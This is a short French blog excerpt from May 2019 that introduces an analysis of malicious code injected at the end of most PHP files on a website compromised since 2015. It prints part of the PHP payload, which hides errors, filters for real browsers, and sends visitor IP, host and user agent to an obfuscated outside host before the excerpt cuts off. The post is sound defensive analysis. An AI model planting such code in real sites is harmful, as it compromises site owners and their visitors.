mai 2019

mercredi, mai 22 2019 13:01

Analyse du code de compromission d'un site web

Voici le bloc de code trouvé à la fin de la majorité des fichiers PHP d’un site corrompu depuis au moins 2015. Analysons le fonctionnement de cette charge malveillante, puis nous conclurons en essayant de deviner les motivations du pirate. <?php #cc8f73# error_reporting(0); @ini_set('display_errors',0); $wp_goik8 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_goik8) && !preg_match ('/bot/i', $wp_goik8))){ $wp_goik098="http://"."web"."https".".com/"."web/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_goik8); if...

Lire la suite

Page top